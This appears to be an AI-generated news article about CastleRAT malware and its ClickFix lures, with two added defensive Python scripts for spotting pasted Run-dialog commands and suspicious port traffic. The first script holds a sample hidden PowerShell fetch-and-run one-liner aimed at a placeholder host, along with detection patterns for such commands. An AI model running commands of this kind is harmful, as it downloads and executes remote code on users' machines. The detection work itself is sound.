

Ethical Hacking News

CastleRAT Malware: A Sophisticated Threat to Cybersecurity


CastleRAT malware, which exists in both Python and C versions, has been spreading through ClickFix attacks that trick victims into installing it themselves. Because the gang behind it runs a malware-as-a-service operation, users need to stay vigilant and take proactive measures to protect themselves against this threat.

  • CastleRAT malware has advanced capabilities and a stealthy nature, making it hard to detect and track.
  • The most recent variant of CastleRAT uses ClickFix attacks to trick users into running the malware themselves.
  • Two other malware families, CastleBot and CastleLoader, spread through bogus GitHub repositories and ClickFix attacks.
  • The gang operates as a malware-as-a-service business, selling its infected systems to other operators.
  • The Python variant is stealthy, with zero or very few antivirus detections, while the C variant has more advanced capabilities.
  • Because users are tricked into running the malware code themselves, the infection is more likely to get past security checks.
  • Recorded Future recommends monitoring ports 443, 7777 and 80 as well as using its own services, and cautions against trusting established providers by default, since the malware was seen hosted on a Google Cloud IP address.


CastleRAT malware has been making headlines lately, and for good reason. This sophisticated threat has drawn attention from cybersecurity experts and researchers because of its advanced capabilities and stealthy nature. In this article, we delve into the details of CastleRAT malware, its variants, and the tactics used by its operators.

The most recent variant of CastleRAT, developed in both Python and C, has been spotted spreading through ClickFix attacks. This technique uses fake login screens mimicking popular applications and web services to trick users into running the malware themselves: the attackers instruct the victim to open the Windows Run dialog box or a PowerShell terminal and paste in malicious code to "fix" the supposed problem. According to PRODAFT's Catalyst platform, TAG-150's CastleLoader lure achieved a 28.7 percent success rate in persuading victims to install the malware themselves.
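As an added example (not code from the article or from the researchers it cites), the following Python helper shows how a defender might triage the Windows Run-dialog history for the kind of pasted command a ClickFix lure asks the victim to type. It assumes the analyst has exported the RunMRU registry values (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) into a dictionary; the sample entries, the heuristic token lists and the placeholder URL are constructed for illustration and are not indicators from this case.

```python
"""Triage Windows Run-dialog history (RunMRU) for ClickFix-style pasted commands.

Hypothetical input format: a dict of RunMRU value names -> data, as an analyst
might export it from the registry. Windows stores each entry as "<command>\1"
and keeps the recency order in the MRUList value.
"""
import re

# Interpreters and living-off-the-land binaries typically named in a pasted "fix".
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil)\b", re.I)
# Fetch-and-run cmdlets/aliases chained into a single line.
DOWNLOAD_EXEC = re.compile(
    r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression"
    r"|downloadstring|start-bitstransfer)\b", re.I)
# Switches that hide the window, skip profile/policy, or pass an encoded payload.
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-ep\s+bypass"
    r"|-executionpolicy\s+bypass)", re.I)
URL = re.compile(r"https?://", re.I)

# Constructed sample export (not real data): three benign entries and one
# ClickFix-shaped entry pointing at a non-resolving placeholder host.
CONSTRUCTED_RUN_MRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "mmc\\1",
    "c": "\\\\fileserver\\share\\1",
    "d": 'powershell -w hidden -nop -c "iex (irm http://example.invalid/fix)"\\1',
}


def strip_mru_suffix(data):
    """Remove the trailing literal backslash-1 that RunMRU appends to every entry."""
    return data[:-2] if data.endswith("\\1") else data


def score_run_entry(cmd):
    """Return the heuristic reasons a Run entry resembles a pasted ClickFix command."""
    reasons = []
    if INTERPRETERS.search(cmd):
        reasons.append("interpreter")
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("download-and-execute")
    if EVASION.search(cmd):
        reasons.append("hidden-or-encoded")
    if URL.search(cmd):
        reasons.append("url")
    if len(cmd) > 60:  # users rarely type long one-liners into Run by hand
        reasons.append("long-command")
    return reasons


def triage_run_mru(run_mru):
    """Walk entries most-recent-first and return the ones with two or more signals.

    Requiring two independent signals keeps plain "cmd" or a UNC path from alerting.
    """
    order = run_mru.get("MRUList", "")
    names = list(order) + [n for n in run_mru if n != "MRUList" and n not in order]
    findings = []
    for name in names:
        if name not in run_mru:
            continue
        cmd = strip_mru_suffix(run_mru[name])
        reasons = score_run_entry(cmd)
        if len(reasons) >= 2:
            findings.append({"value": name, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in triage_run_mru(CONSTRUCTED_RUN_MRU):
        print(hit["value"], hit["reasons"], hit["command"])
```

The same scoring can be applied to PowerShell script-block logs or EDR process-creation events; the RunMRU key is simply the artifact that survives on the endpoint when a victim follows the "open Run and paste this" instruction.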

CastleRAT is operated by the TAG-150 criminal crew, which was first identified this spring. The group had already developed two other malware families, CastleBot and CastleLoader, which spread through bogus GitHub repositories and through ClickFix attacks that socially engineer computer users into running the malware themselves. According to IBM, the gang operates as a malware-as-a-service business, selling its infected systems to operators running a variety of info-stealing and ransomware operations.

The Python variant of CastleRAT is far sneakier at slipping under the radar, showing zero or very few antivirus detections, which makes it hard for security researchers to detect and track. The C variant, by contrast, has more advanced capabilities, including harvesting keystrokes, taking screen captures, and establishing persistence.

The ClickFix technique used by TAG-150's malware families has proven disturbingly effective at persuading victims to install the malware themselves. Because the user runs the malicious code with their own hands, the infection is more likely to get past security checks.

To combat this threat, Recorded Future recommends using its own services and monitoring ports 443 and 7777, and of course port 80, for suspicious activity. The researchers also caution against relying on the reputation of established providers alone, since they observed the malware being hosted from a Google Cloud IP address.
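The port guidance above, turned into detection logic as an added example (this is not code from the article, Recorded Future or the researchers it cites): the script parses constructed, Zeek-conn-style connection records, flags traffic on 7777 outright and traffic on 443/80 to destinations outside a specific allowlist, and then shows what a naive "trust the cloud provider's address space" allowlist would have suppressed. All addresses are RFC 5737 documentation ranges standing in for real infrastructure; the log format and the allowlist are assumptions.

```python
"""Flag outbound connections on the ports named in the article and show why a
provider-wide allowlist is the wrong suppression rule.

Added example. Input lines are constructed in the shape:
    ts src sport dst dport proto bytes_out
"""
import ipaddress
from collections import Counter

WATCH_PORTS = {80, 443, 7777}
WEB_PORTS = {80, 443}
# Allowlist specific destinations (constructed: a corporate proxy and an update
# server), never whole provider ranges.
KNOWN_GOOD_DESTINATIONS = {"192.0.2.10", "192.0.2.11"}

# Constructed stand-in for a public cloud provider's range. The article reports the
# malware being served from Google Cloud space, so a range like this must not be
# treated as trusted just because a well-known provider owns it.
CONSTRUCTED_CLOUD_RANGE = ipaddress.ip_network("203.0.113.0/24")

# Constructed sample records (not real traffic).
CONSTRUCTED_CONN_LOG = """\
1757000001.100 10.0.0.21 51522 192.0.2.10 443 tcp 1200
1757000002.220 10.0.0.21 51530 203.0.113.44 443 tcp 98000
1757000003.300 10.0.0.33 51601 203.0.113.44 7777 tcp 4096
1757000004.400 10.0.0.21 51602 192.0.2.11 80 tcp 300
1757000005.500 10.0.0.40 51700 198.51.100.7 22 tcp 800
"""


def parse_conn_line(line):
    """Split one whitespace-separated record into typed fields."""
    ts, src, sport, dst, dport, proto, bytes_out = line.split()
    return {"ts": float(ts), "src": src, "sport": int(sport), "dst": dst,
            "dport": int(dport), "proto": proto, "bytes_out": int(bytes_out)}


def flag_connections(log_text):
    """Return records on watched ports that are not going to known-good destinations.

    Port 7777 is flagged unconditionally: it has no business use here, so any hit
    is worth a look. Web ports are flagged only for destinations outside the
    explicit allowlist.
    """
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        c = parse_conn_line(line)
        if c["dport"] not in WATCH_PORTS:
            continue
        if c["dport"] in WEB_PORTS and c["dst"] in KNOWN_GOOD_DESTINATIONS:
            continue
        if c["dport"] == 7777:
            c["reason"] = "non-standard port 7777"
        else:
            c["reason"] = f"web port {c['dport']} to unlisted destination"
        alerts.append(c)
    return alerts


def suppressed_by_provider_allowlist(alerts):
    """Alerts a naive 'the provider is reputable' rule would have thrown away."""
    return [a for a in alerts
            if ipaddress.ip_address(a["dst"]) in CONSTRUCTED_CLOUD_RANGE]


def summarize(alerts):
    """Count flagged (source, destination) pairs to spot a single host beaconing."""
    return Counter((a["src"], a["dst"]) for a in alerts)


if __name__ == "__main__":
    hits = flag_connections(CONSTRUCTED_CONN_LOG)
    for a in hits:
        print(a["src"], "->", a["dst"], a["dport"], a["reason"])
    print("hidden by provider allowlist:", len(suppressed_by_provider_allowlist(hits)))
    print(summarize(hits))
```

In the constructed log both alerts point at the same provider-range address, so a rule that trusted the whole range would have produced zero findings; allowlisting by exact destination keeps them visible while still letting the proxy and update server through.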

In conclusion, CastleRAT represents a sophisticated threat, its advanced capabilities and stealthy nature making it hard to detect and track. The use of ClickFix attacks and the gang's malware-as-a-service model make it essential for users to be vigilant and take proactive measures to protect themselves against this threat.



Related Information:
  • https://www.ethicalhackingnews.com/articles/CastleRAT-Malware-A-Sophisticated-Threat-to-Cybersecurity-ehn.shtml
  • https://go.theregister.com/feed/www.theregister.com/2025/09/05/clickfix_castlerat_malware/
  • https://www.msn.com/en-us/money/other/shell-to-pay-crims-invade-your-pc-with-castlerat-malware-now-in-c-and-python/ar-AA1LYtMr
  • https://consumer.ftc.gov/articles/malware-how-protect-against-detect-and-remove-it


Published: Fri Sep 5 15:25:16 2025 by llama3.2 3B Q4_K_M